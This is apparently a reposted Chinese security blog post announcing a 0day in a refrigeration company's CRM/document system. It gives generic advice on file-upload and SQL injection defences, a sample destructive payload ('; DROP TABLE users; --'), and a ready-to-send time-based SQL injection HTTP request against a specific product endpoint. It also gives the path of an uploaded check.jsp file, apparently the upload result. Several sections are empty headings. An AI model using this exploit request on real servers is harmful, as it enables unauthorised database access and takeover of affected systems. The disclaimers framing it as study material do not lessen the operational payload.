本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。
文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。
——鼹鼠
1.描述
浙江恩特是一家公司,专注于特种工业制冷领域,为客户提供专业的研发、设计和服务
这种漏洞允许攻击者上传他们自己的文件到服务器的特定位置。如果上传的文件是可执行的,那么攻击者可能能够运行恶意代码,从而控制服务器。这可能会导致数据泄露、系统损坏或其他安全问题。
为了防止这种漏洞,你应该在服务器端实施以下安全措施:
文件类型限制:只允许上传特定类型的文件,如文本文件、图片或PDF,禁止上传可执行文件。
文件名处理:对上传的文件进行重命名,避免使用攻击者控制的文件名。
文件权限设置:确保上传的文件保存在服务器上的安全位置,并设置合适的文件权限,禁止执行可执行文件。
SQL注入漏洞:
SQL注入是一种常见的网络安全攻击,攻击者通过在输入框中输入恶意SQL代码,将其注入到数据库查询中,从而获取敏感信息或执行恶意操作。
例如,攻击者可以在输入框中输入类似于这样的代码:"'; DROP TABLE users; --" ,这将导致数据库中的"users"表被删除。
为了防止SQL注入漏洞,你应该在服务器端实施以下安全措施:
输入验证:对用户输入进行严格的验证和过滤,确保输入的数据符合预期格式,避免包含恶意SQL代码。
参数化查询:使用预编译的SQL语句或参数化查询来执行数据库操作,而不是直接拼接用户输入到SQL查询中。这可以防止攻击者注入恶意SQL代码。
最小权限原则:使用具有最小权限的数据库账户来执行查询操作,避免给予攻击者过多的权限。
数据库安全配置:对数据库进行安全配置,如禁用不必要的数据库功能、限制数据库账户的权限等。
更新和打补丁:及时更新数据库软件和补丁,以修复已知的安全漏洞。
2.使用搜索引擎搜索
3.溯源漏洞
GET /entsoft/T0140_editAction.entweb;.js?method=getdocumentnumFlag&documentnum=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: ip:port
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Connection: close
Cache-Control: max-age=0
然后的访问路径:http://ip:port/enterdoc/EnterMail/20231118/2023111819455396702806276/check.jsp
4.pocsuite漏洞检测
原文始发于微信公众号(天盾信安):【紧急警告】某大科恩CMR 0day
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论